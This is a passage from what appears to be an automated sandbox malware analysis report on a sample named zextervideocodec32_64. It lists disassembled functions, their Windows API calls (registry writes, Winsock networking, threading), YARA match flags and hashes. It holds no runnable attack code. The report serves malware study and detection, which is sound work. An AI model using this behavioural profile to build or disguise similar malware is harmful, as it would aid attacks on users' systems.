                                                                                                      • Instruction ID: 104638891e9a0b46a217ac017b98ef4e97e27f85541b5f5156026dc646e067e7
                                                                                                      • Opcode Fuzzy Hash: 2769607d8c369f2e623bd2ec4ff51e74da7c3ecd7a49713c99612e9cec00e6fa
                                                                                                      • Instruction Fuzzy Hash: BF21A771E00214ABDF14BFB4D444AEEBBBAEF44324F2085DDED1997280EBB446018FA1
                                                                                                      Function 0040276D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 00402792
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: Common AppData
                                                                                                      • API String ID: 3660427363-2574214464
                                                                                                      • Opcode ID: 158ae254c2c16aa740a981b966b7fddd2cbe96f16fcdc6f9a27de899f2d968d4
                                                                                                      • Instruction ID: 9a277ccd48b8da7b9e07736cee9e399eb09a3ecf5512108b267f3c7f6d774d12
                                                                                                      • Opcode Fuzzy Hash: 158ae254c2c16aa740a981b966b7fddd2cbe96f16fcdc6f9a27de899f2d968d4
                                                                                                      • Instruction Fuzzy Hash: FFE09270C18104EBCB010BE04E0897E37747A087257314E77E423760E1C7BE580AB69F
                                                                                                      Function 02BC97C6 Relevance: 4.7, APIs: 3, Instructions: 151networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC984A
                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 02BC9858
                                                                                                      • FreeAddrInfoW.WS2_32(?), ref: 02BC998C
                                                                                                        • Part of subcall function 02BC9F2B: __EH_prolog.LIBCMT ref: 02BC9F30
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddrErrorFreeH_prologInfoLastgetaddrinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 927184805-0
                                                                                                      • Opcode ID: 6598723f8997deef9d70b5705bb350ae249a5b5a0cf67b6f3bbaa0184e9be839
                                                                                                      • Instruction ID: 3ef42993c7afbaa5f6cf0275ec49aec8bddc479ff0f23cd1423f7fb2a5760307
                                                                                                      • Opcode Fuzzy Hash: 6598723f8997deef9d70b5705bb350ae249a5b5a0cf67b6f3bbaa0184e9be839
                                                                                                      • Instruction Fuzzy Hash: 1851CD715087819FE324DF24C845BABBBE9FF84710F20095DFA99932C0CBB0A945CB92
                                                                                                      Function 02BC353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 90d9d9787798a74a05a1bc0cfe2eb91cc2671b28218fd91c71d5630f28c45368
                                                                                                      • Instruction ID: 558d5a3da11220f741bb971c831d220e15176c5424a8aa213e36afb7273f2eda
                                                                                                      • Opcode Fuzzy Hash: 90d9d9787798a74a05a1bc0cfe2eb91cc2671b28218fd91c71d5630f28c45368
                                                                                                      • Instruction Fuzzy Hash: 6D512DB1905256DFCB08DF68D5406AABBF1FF08320F24C5AEE8699B381D7749911CFA1
                                                                                                      Function 02BC369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02BC36A7
                                                                                                        • Part of subcall function 02BC2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                                                        • Part of subcall function 02BC2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                                                        • Part of subcall function 02BC2420: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                                                        • Part of subcall function 02BC2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                                                        • Part of subcall function 02BC2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1601054111-0
                                                                                                      • Opcode ID: 9b32708a2a1df52960ea894032c98192dccf8e36f13f0601524a03bfd7c68163
                                                                                                      • Instruction ID: 6abf90de7e055f011553c47915c26db1da259ddb67211b704e5f0e418baec469
                                                                                                      • Opcode Fuzzy Hash: 9b32708a2a1df52960ea894032c98192dccf8e36f13f0601524a03bfd7c68163
                                                                                                      • Instruction Fuzzy Hash: CB11C4B5104209EBDF219E14DC85FAA3BA5EF00755F6084AAFE568A290CB35D860DB94
                                                                                                      Function 02BD20D0 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __beginthreadex.LIBCMT ref: 02BD20E6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02BCA95F,00000000), ref: 02BD2117
                                                                                                      • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02BCA95F,00000000), ref: 02BD2125
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                      • String ID:
                                                                                                      • API String ID: 1685284544-0
                                                                                                      • Opcode ID: d43a5e037be1ec5f0bf4447a981dfddf46d97d6945e9b4bf810ebe5077a838e9
                                                                                                      • Instruction ID: 553647abbe715106860e1f6f02b12fe1d2f81068b6299f5272c69dcedddb3426
                                                                                                      • Opcode Fuzzy Hash: d43a5e037be1ec5f0bf4447a981dfddf46d97d6945e9b4bf810ebe5077a838e9
                                                                                                      • Instruction Fuzzy Hash: 83F0FC706402019BDB209F5DDC84FD1B3D8EF48325F14459AF644C7292D771E892DF90
                                                                                                      Function 02BC1AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(02BF72AC), ref: 02BC1ABA
                                                                                                      • WSAStartup.WS2_32(00000002,00000000), ref: 02BC1ACB
                                                                                                      • InterlockedExchange.KERNEL32(02BF72B0,00000000), ref: 02BC1AD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 1856147945-0
                                                                                                      • Opcode ID: 70178f067e5908d418ae39b44b8591324ed67ec54cbf109f622cfb24de53e48d
                                                                                                      • Instruction ID: 83e1c41d77145f6beace742aaf7cda8378199b8065d99cbb662888c5a1d5097a
                                                                                                      • Opcode Fuzzy Hash: 70178f067e5908d418ae39b44b8591324ed67ec54cbf109f622cfb24de53e48d
                                                                                                      • Instruction Fuzzy Hash: F6D05E31990208ABF62077A8AC0EA78F72CE706751F1006D5FDBAC60C1EE505624A5A7
                                                                                                      Function 02BD3473 Relevance: 4.5, APIs: 3, Instructions: 16threadCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __getptd_noexit.LIBCMT ref: 02BD3477
                                                                                                        • Part of subcall function 02BD5C52: GetLastError.KERNEL32(75920A60,7591F550,02BD5E40,02BD3013,7591F550,?,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5C54
                                                                                                        • Part of subcall function 02BD5C52: __calloc_crt.LIBCMT ref: 02BD5C75
                                                                                                        • Part of subcall function 02BD5C52: __initptd.LIBCMT ref: 02BD5C97
                                                                                                        • Part of subcall function 02BD5C52: GetCurrentThreadId.KERNEL32 ref: 02BD5C9E
                                                                                                        • Part of subcall function 02BD5C52: SetLastError.KERNEL32(00000000,02BC606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02BC6508), ref: 02BD5CB6
                                                                                                      • __freeptd.LIBCMT ref: 02BD3491
                                                                                                        • Part of subcall function 02BD3576: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02BD3490), ref: 02BD3590
                                                                                                        • Part of subcall function 02BD3576: GetProcAddress.KERNEL32(00000000), ref: 02BD3597
                                                                                                        • Part of subcall function 02BD3576: RtlEncodePointer.NTDLL(00000000), ref: 02BD35A2
                                                                                                        • Part of subcall function 02BD3576: RtlDecodePointer.NTDLL(02BD3490), ref: 02BD35BD
                                                                                                      • RtlExitUserThread.NTDLL(?,00000000,?,02BD3453,00000000), ref: 02BD349A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProcUser__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 2811226776-0
                                                                                                      • Opcode ID: c0d45f4b221bc875a7cc9faf5f717131c257a1c41124e33f4230183e23dc7f2f
                                                                                                      • Instruction ID: 99aa62fc13b1102c201755876229aedf8bc6d3e6e0b87abbaa76f3feb3a199ea
                                                                                                      • Opcode Fuzzy Hash: c0d45f4b221bc875a7cc9faf5f717131c257a1c41124e33f4230183e23dc7f2f
                                                                                                      • Instruction Fuzzy Hash: B8D0A73180161467C6337764C8487CF7DD99F00358F0C04E8D40009106BF246980CFE7
                                                                                                      Function 0040D19E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\SmallTour), ref: 0040D52A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID: Software\SmallTour
                                                                                                      • API String ID: 2289755597-3113880327
                                                                                                      • Opcode ID: eb4e32b9e61e82fc7f8fc0274ee4e68f45f73c1359f364c673ce3dd768ed4775
                                                                                                      • Instruction ID: 927dd9ebb52ca5c25177259832990301b57c9ecb35a80484e5a468b18b7f84d1
                                                                                                      • Opcode Fuzzy Hash: eb4e32b9e61e82fc7f8fc0274ee4e68f45f73c1359f364c673ce3dd768ed4775
                                                                                                      • Instruction Fuzzy Hash: E101A736D04101EBD6404B70BE61AE27BB5A716B95724417BD592731A3D238890BDA2E
                                                                                                      Function 02BC4BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4BF2
                                                                                                        • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                                                        • Part of subcall function 02BCE0CE: __EH_prolog.LIBCMT ref: 02BCE0D3
                                                                                                        • Part of subcall function 02BCE0CE: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCE152
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4CF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1927618982-0
                                                                                                      • Opcode ID: 005c2e671a562ad18086692471e02f61e9bd39511c07145d0fb34e988813e2f8
                                                                                                      • Instruction ID: 8d686b57fd122d4af96dbd6f638414be815374c6b384c842cc62910e7a395891
                                                                                                      • Opcode Fuzzy Hash: 005c2e671a562ad18086692471e02f61e9bd39511c07145d0fb34e988813e2f8
                                                                                                      • Instruction Fuzzy Hash: BC51F571D04248DFDB15EFA8C494AEEBBB5EF08314F2481AEE915AB352DB709A44CF50
                                                                                                      Function 02BC2D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC2D47
                                                                                                      • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02BC2D5C
                                                                                                        • Part of subcall function 02BCA4DF: WSAGetLastError.WS2_32(00000000,?,?,02BC2A51), ref: 02BCA4ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Send
                                                                                                      • String ID:
                                                                                                      • API String ID: 1282938840-0
                                                                                                      • Opcode ID: 480b9415f27a82ce424fdc4c4b0eb915e690efd597bd419a129f03c1564684d8
                                                                                                      • Instruction ID: 9d77ff2a232a859321eec757ee32f66e4d78b18fccc3a3ab3cad0d54fa7b0276
                                                                                                      • Opcode Fuzzy Hash: 480b9415f27a82ce424fdc4c4b0eb915e690efd597bd419a129f03c1564684d8
                                                                                                      • Instruction Fuzzy Hash: 650184B5501205EFD7206F98D88486FBBEDFF45364B2009AEFC6987200EB709D409BA1
                                                                                                      Function 0040D243 Relevance: 3.0, APIs: 2, Instructions: 41registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegSetValueExA.KERNELBASE(?), ref: 0040D5C1
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3132538880-0
                                                                                                      • Opcode ID: 713251547485dac0a2bbd8a3e555094c32b96ee7312fc95f47136c58e5ae1e1e
                                                                                                      • Instruction ID: e6331f095b514331b0d29c0ebab7d5f4f3fc4baceba449352ef9d25cf3a5f709
                                                                                                      • Opcode Fuzzy Hash: 713251547485dac0a2bbd8a3e555094c32b96ee7312fc95f47136c58e5ae1e1e
                                                                                                      • Instruction Fuzzy Hash: 53F06236D05141DBC7054BB0FE61AA57BF1B65ABA1325813AD58272272C334890ADB19
                                                                                                      Function 02BC83C0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC83DD
                                                                                                      • shutdown.WS2_32(?,00000002), ref: 02BC83E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastshutdown
                                                                                                      • String ID:
                                                                                                      • API String ID: 1920494066-0
                                                                                                      • Opcode ID: 7230426c2b84c7999f290d832e8bd4339a8d1dcb964d0c248a58522fa808eb85
                                                                                                      • Instruction ID: 89b7fa61fd2476994c0068fa9b4cd78b16a109d71613a71ecedea68362a2c4d4
                                                                                                      • Opcode Fuzzy Hash: 7230426c2b84c7999f290d832e8bd4339a8d1dcb964d0c248a58522fa808eb85
                                                                                                      • Instruction Fuzzy Hash: 78F03071A45314DFDB20AF68D404B5ABBE5FF09320F15889DEDA59B380EB71AC10CBA1
                                                                                                      Function 00403FF4 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F0F,00000000), ref: 00404005
                                                                                                        • Part of subcall function 00403EAC: GetVersionExA.KERNEL32 ref: 00403ECB
                                                                                                      • HeapDestroy.KERNEL32 ref: 00404044
                                                                                                        • Part of subcall function 004043CB: HeapAlloc.KERNEL32(00000000,00000140,0040402D,000003F8), ref: 004043D8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507506473-0
                                                                                                      • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                                      • Instruction ID: b1684c5e0161eeb02f30399066ba6d75b4260e35b9d13e26dc8fbe5d47634710
                                                                                                      • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                                      • Instruction Fuzzy Hash: F5F092F0656301DAEB301B75AE46B3A39949BC0796F20443BF740F91E1EF7C8481960D
                                                                                                      Function 02BC5119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC511E
                                                                                                        • Part of subcall function 02BC3D7E: htons.WS2_32(?), ref: 02BC3DA2
                                                                                                        • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                                                        • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: htonl$H_prologhtons
                                                                                                      • String ID:
                                                                                                      • API String ID: 4039807196-0
                                                                                                      • Opcode ID: 5a304c7f8321b5760ab9dd15413b3a1d8d4193259c1f86fb8d79e02810bfcdfe
                                                                                                      • Instruction ID: b318aaa8e9e04a281e817cd12f0b16e45977c727e233c9d9a4ea047e80ce2672
                                                                                                      • Opcode Fuzzy Hash: 5a304c7f8321b5760ab9dd15413b3a1d8d4193259c1f86fb8d79e02810bfcdfe
                                                                                                      • Instruction Fuzzy Hash: A98145B1D0424E8ECF15DFA8D580AEEBBB5EF48210F2081AED851B7241EB716A45CF74
                                                                                                      Function 02BC44AB Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 230b824c50c8ce0514ae740f82f8b6e7ffdec73107d2720661bf0b4c3ce674f0
                                                                                                      • Instruction ID: 102ffe6da4e6837c07718f2922c5887d1d6eed4405e2e6407544d1648ea36059
                                                                                                      • Opcode Fuzzy Hash: 230b824c50c8ce0514ae740f82f8b6e7ffdec73107d2720661bf0b4c3ce674f0
                                                                                                      • Instruction Fuzzy Hash: 2541097190120AAFCF15DF99C890EEEBBB9FF88314F2441AEE545A7240D7749A45CBA0
                                                                                                      Function 02BCE997 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCE99C
                                                                                                        • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prologValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3700342317-0
                                                                                                      • Opcode ID: 0194c49563a72f30f21589cd6d5b166fc24fa3aaa98388603b093c36a64097c4
                                                                                                      • Instruction ID: 9f08f42625341735a9bd6624c4f1efb4d356f4d5c0a6355255fb7058dfe65c5b
                                                                                                      • Opcode Fuzzy Hash: 0194c49563a72f30f21589cd6d5b166fc24fa3aaa98388603b093c36a64097c4
                                                                                                      • Instruction Fuzzy Hash: 8D211BB2904209EFDB14DFA9D540AEEBBF9EF48310F2041AEE915E7240D771A901CBA1
                                                                                                      Function 0040D56B Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: 602ae3e857ddb9a477b990e8c51bbb5b03d0f4ff67d1b8e24c6534ee993f563a
                                                                                                      • Instruction ID: a36abb13542148fe0e2184bce6fc4a30d84a4443659d953cd64425ef62fa15e7
                                                                                                      • Opcode Fuzzy Hash: 602ae3e857ddb9a477b990e8c51bbb5b03d0f4ff67d1b8e24c6534ee993f563a
                                                                                                      • Instruction Fuzzy Hash: 47117139904252DBC3018B74EE55AA57FB0F61B750318457AC8D162363C334DD0BDB5C
                                                                                                      Function 0040D553 Relevance: 1.6, APIs: 1, Instructions: 59registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D5CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: e6f74f1aae8f8915e941b36548827f360267f7e4e505bab853985922fbd2a965
                                                                                                      • Instruction ID: b75ff2dc20aaa2e6f21dbf5a413c5fb9bbeedf7bbd5764e02b2ca00ed5a47c52
                                                                                                      • Opcode Fuzzy Hash: e6f74f1aae8f8915e941b36548827f360267f7e4e505bab853985922fbd2a965
                                                                                                      • Instruction Fuzzy Hash: E201F53A8052629BCB018B74FE61691BFB1F65A7A1324427AD5D263273C7358C0BC758
                                                                                                      Function 02C2F515 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bfa000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: b10560d7e5c54b7bf6027b605ee94fd758f7f77f435ae11517a1e738f0f0a1eb
                                                                                                      • Instruction ID: 3d47765c70f113d8b732e134ca24a81fda6fae1d3aff66776b6547dc38610deb
                                                                                                      • Opcode Fuzzy Hash: b10560d7e5c54b7bf6027b605ee94fd758f7f77f435ae11517a1e738f0f0a1eb
                                                                                                      • Instruction Fuzzy Hash: 5E110CB211C6049FD719AF29D885779FBE8EF48710F06092DE6C5C7740EA319444CA9B
                                                                                                      Function 02BC33B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC33CC
                                                                                                        • Part of subcall function 02BC32AB: __EH_prolog.LIBCMT ref: 02BC32B0
                                                                                                        • Part of subcall function 02BC32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC32C3
                                                                                                        • Part of subcall function 02BC32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC32EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1518410164-0
                                                                                                      • Opcode ID: a4f7783ed780c5b063fc06a9587726b192379c5d060867276e7e5ad1259ceda0
                                                                                                      • Instruction ID: 8a6f6c5d4c539d4967a9179bb3f20778ed4367ff24d054e1afc911054121ed95
                                                                                                      • Opcode Fuzzy Hash: a4f7783ed780c5b063fc06a9587726b192379c5d060867276e7e5ad1259ceda0
